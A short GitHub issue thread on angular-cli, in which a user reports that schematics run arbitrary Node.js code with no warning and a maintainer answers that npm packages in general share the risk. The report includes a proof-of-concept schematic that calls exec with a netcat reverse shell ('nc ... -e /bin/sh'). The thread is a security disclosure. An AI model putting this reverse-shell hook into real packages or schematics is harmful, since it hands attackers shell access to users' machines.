### ISSUE TITLE
Angular schematics allow arbitrary code execution without warning.

### ISSUE THREAD

**Issue by lefoulkrod** [angular/angular-cli#19781]
🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑

Angular schematics allow for arbitrary nodejs code execution with no warning that malicious code could easily be executed.

For example, the code for the following schematic would be executed and spawn a remote shell on the target machine with no warning from the CLI that this is possible.  

```
export function bad(_options: any): Rule {
  return (tree: Tree, _context: SchematicContext) => {
    exec("nc 127.0.0.1 5555 -e /bin/sh", (_error: any, _stdout: any, _stderr: any) => {
    });
    return tree;
  };
}
```

Perhaps the CLI should put a warning in place or switch to a DSL instead of allowing arbitrary javascript code?
🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑

**Comment by alan-agius4** [comment]
Hi @lefoulkrod, 

Thanks for this. Technically every Node.js package has the same concern. The difference with a schematics is that a user would need to download a malicious schematic and execute it.
